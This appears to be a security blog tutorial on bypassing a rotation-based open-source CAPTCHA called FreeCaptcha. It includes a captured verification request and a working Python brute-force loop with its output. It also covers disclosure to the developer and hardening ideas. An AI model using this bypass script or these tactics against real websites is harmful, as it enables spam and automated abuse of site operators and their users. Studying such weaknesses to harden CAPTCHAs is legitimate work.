We all know what it’s like – you need to log in to a site, so you have to select the motorboats from a bunch of tiny pictures. Modern Captcha systems like hCaptcha, FunCaptcha, and Google’s ReCAPTCHA have come a long way since the old days of squiggly text. But what tools are available to pentesters who need to defeat Captcha programmatically as part of a job?
OCR (Optical Character Recognition) algorithms quickly defeated even the most advanced classic Captchas. Admins trying to protect their forums from the deluge of spam made the characters even harder to read, but this was inconvenient for legitimate users. When Google announced ReCaptcha, an easy-to-use new system based on machine learning, webmasters worldwide rejoiced.
But it wasn’t long until hackers caught up.
Let’s look at how attackers bypass Captcha to spam “protected” websites. To do so, we’ll develop our own script for defeating a modern, open-source Captcha system. Whether it’s bypassing a login form or “proving” you’re human to scrape a social media site, we’ll equip you with the tactics you need to get past modern Captcha systems.
Selecting a system to crack
To start out, we need to pick a specific Captcha system that we want to attack. Everyone targets ReCaptcha, so let’s try something a bit more original. I’ve always been a fan of the FunCaptcha challenges used by GitHub and Twitch, although I’d prefer an open-source alternative that doesn’t require JavaScript.
Luckily, the University of Constantinople’s infosec research team made FreeCaptcha. Their new tool works similarly to FunCaptcha, in that it asks the user to rotate an image until it’s upright. However, unlike FunCaptcha, this tool is free, open-source, and uses no JS. For any privacy fans, that last feature will be especially interesting. No JS means that Tor users will be more comfortable with FreeCaptcha.
Great, so we’ve got a free and open-source Captcha that’s also popular and modern. We’re ready to start hacking!
Hacking FreeCaptcha
We’ll start by reverse engineering FreeCaptcha. If we just look at the HTML, we see that it uses a bunch of nested, transparent checkboxes. The design is wild. Each time you click, you check another checkbox. When you click “Done?”, you actually submit a form within an iframe. The network request looks like this:
POST /verify_captcha HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Cookie: freecaptcha=d45f489a-1b81-4687-996c-f42cb4432239
Content-Length: 74
btnControl4=on&btnControl3=on&btnControl2=on&btnControl1=on&btnControl0=on
That post data at the end? Those are all the buttons we clicked. The backend will then verify that this is the right number of clicks to have rotated the image upright. If so, our FreeCaptcha cookie will be “blessed” as having passed the challenge. Phew!
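To make the request format concrete, here is a minimal sketch of how that form body could be built for a given number of clicks. The helper name build_click_payload is hypothetical, and the rule that n clicks check btnControl0 through btnControl(n-1) is an assumption inferred only from the captured request above, not from FreeCaptcha's source.

```python
from urllib.parse import urlencode


def build_click_payload(clicks: int) -> dict:
    """Return form fields for `clicks` rotation clicks (hypothetical helper).

    Assumes each click checks one more checkbox, named btnControl0,
    btnControl1, and so on, as seen in the captured request.
    """
    if clicks < 0:
        raise ValueError("clicks must be non-negative")
    # Highest-numbered checkbox first, matching the order in the capture.
    return {f"btnControl{i}": "on" for i in reversed(range(clicks))}


body = urlencode(build_click_payload(5))
print(body)       # the URL-encoded form body
print(len(body))  # its length in bytes (the Content-Length value)
```

With five clicks, this reproduces the 74-byte body from the capture. Passing the same dict as data= to a requests POST would send an equivalent form.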
So how do we beat this? Well, the image can only appear at one of six angles. Thus, we can just guess and we’ll be right about 17% of the time (1 in 6). If we write our script to guess a bunch of times in a row, it shouldn’t take long to guess right.
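How long is "not long"? As a rough sketch, assume every attempt gets a fresh challenge whose angle is uniformly random over the six positions. That is an assumption about FreeCaptcha's behavior, not something verified here. Under it, the chance of at least one success in n tries is 1 - (5/6)^n. The function name success_within is illustrative.

```python
def success_within(tries: int, angles: int = 6) -> float:
    """Probability that at least one of `tries` independent guesses is right."""
    return 1 - (1 - 1 / angles) ** tries


# Show how quickly the odds improve as the script keeps retrying.
for n in (1, 6, 12, 25):
    print(f"{n:>2} tries: {success_within(n):.1%}")
```

Under these assumptions, six tries succeed roughly two times out of three, and the average run needs about six requests.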
Here’s a quick Python script to get a cookie that has “passed” the challenge:
import requests

captcha_page = 'http://localhost:5000'
captcha_defeated = False

while not captcha_defeated:
    print('Attempting to bruteforce freecaptcha verification...')
    # Get a fresh freecaptcha cookie
    s = requests.Session()
    s.get(captcha_page + '/captcha')
    # Guess that the image isn't rotated at all
    # (easiest thing to guess, will be true 1/6 times)
    resp = s.post(captcha_page + '/verify_captcha')
    if resp.status_code == 200:
        captcha_defeated = True

print('Cookie that has passed the challenge:')
print(s.cookies.get('freecaptcha'))
It just keeps trying again and again. Let’s see how many tries it actually takes for our script to get a valid cookie that has passed the challenge.
$ python3 hack_fc.py
Attempting to bruteforce freecaptcha verification...
Attempting to bruteforce freecaptcha verification...
Attempting to bruteforce freecaptcha verification...
Cookie that has passed the challenge:
316da094-8259-42f4-8266-5f9739eeb661
According to the Linux time command, the run time is… 0.07 seconds. Wow.
Making It Harder to Defeat Captcha
After seeing these results, I emailed the lead developer of FreeCaptcha. I wanted to see if these results might help him improve FreeCaptcha.
He wrote back:
Our goal with FreeCaptcha was to make a free, open source, pro-privacy tool as strong as commercial offerings on the market. Sadly, that’s a low bar. Thanks for the free pentest, we’ll make freecaptcha v2 much stronger using this feedback.
Jesus Aviles, FreeCaptcha lead dev
That’s great news. Specifically, I suggested that rotating one single image is just too easy. Instead, users should have to rotate several smaller images. ReCaptcha and hCaptcha even require users to identify two separate pages of images. However, for a rotation-based tool like FreeCaptcha, two pages of challenges would just be overkill.
Let’s do the math, and see how many requests it would take for an attacker to brute force a challenge where they have to rotate six images.
A single image can be guessed with odds of 1/6. Each additional image we add to the challenge multiplies those odds by another 1/6. So with six challenge images, the odds of guessing the exact rotation of every image using brute force would be (1/6)^6 = 1/46,656.
46,656 network requests should be more than enough to keep out all but the most persistent, sophisticated enemies. Your forum script kiddie won’t defeat Captcha with those odds. But is Captcha really just a numbers game, or does a strong Captcha system need other ingredients?
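The same arithmetic generalizes to any number of images. The sketch below assumes each image independently takes one of six angles and that the attacker guesses blindly against a fresh challenge each time. The function name expected_requests is illustrative.

```python
def expected_requests(images: int, angles: int = 6) -> int:
    """Average number of blind guesses needed when every image must be right."""
    # Each guess succeeds with probability (1/angles) ** images, so the
    # mean of the resulting geometric distribution is angles ** images.
    return angles ** images


for k in range(1, 7):
    print(f"{k} image(s): {expected_requests(k):,} requests on average")
```

Note that this figure is an average rather than a guarantee: a lucky attacker can get through sooner, so rate limiting still matters.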
Other Ways to Defeat Captcha
Bruteforce isn’t the only game in town. Recall that security researchers defeated classic Captcha using OCR, not brute force. The biggest existential threat to modern Captcha is machine learning. What kinds of deep learning networks can detect rotated images?
The closest solution is RotNet. This ML library corrects the orientation of images. Only a sophisticated attacker is likely to get this working against FreeCaptcha, but it shows that the possibility is there. Defenders using FreeCaptcha can fight back by finding which types of images RotNet struggles to correct, and using those for their Captcha challenges.
Of course, there’s always the menace of Captcha solving services.
With anti-captcha.com, hackers can pay for workers in the developing world to solve 1,000 Captchas for 50 cents. Prices this low mean that for just a few dollars, anyone can defeat Captcha. Mainstream services like Google and hCaptcha could make this harder for bad actors by implementing fingerprinting. That way, if you switch IP address or user-agent, they assume you’re a bot.
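As a rough illustration of the fingerprinting idea, a server could bind a passed challenge to the client that solved it. This is a minimal sketch, not how Google, hCaptcha, or FreeCaptcha actually work. SECRET_KEY, fingerprint, and is_same_client are hypothetical names, and real fingerprinting would likely use more signals than IP address and user-agent.

```python
import hashlib
import hmac

SECRET_KEY = b"replace-with-a-random-server-side-secret"  # hypothetical


def fingerprint(ip: str, user_agent: str) -> str:
    """Keyed hash of the client traits seen when the challenge was solved."""
    message = f"{ip}\n{user_agent}".encode("utf-8")
    return hmac.new(SECRET_KEY, message, hashlib.sha256).hexdigest()


def is_same_client(stored: str, ip: str, user_agent: str) -> bool:
    """True only if the current request matches the stored fingerprint."""
    return hmac.compare_digest(stored, fingerprint(ip, user_agent))


# Fingerprint recorded when the challenge was solved (example addresses).
stored = fingerprint("203.0.113.7", "Mozilla/5.0 Firefox/99.0")
same = is_same_client(stored, "203.0.113.7", "Mozilla/5.0 Firefox/99.0")
moved = is_same_client(stored, "198.51.100.9", "Mozilla/5.0 Firefox/99.0")
print(same, moved)
```

A solved cookie handed from a paid solver to a bot on a different IP address would fail this check.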
FreeCaptcha could follow this approach, but what about Tor? I suppose for now they’ll just have to add this feature for non-Tor users. It’s a problem no one has solved yet.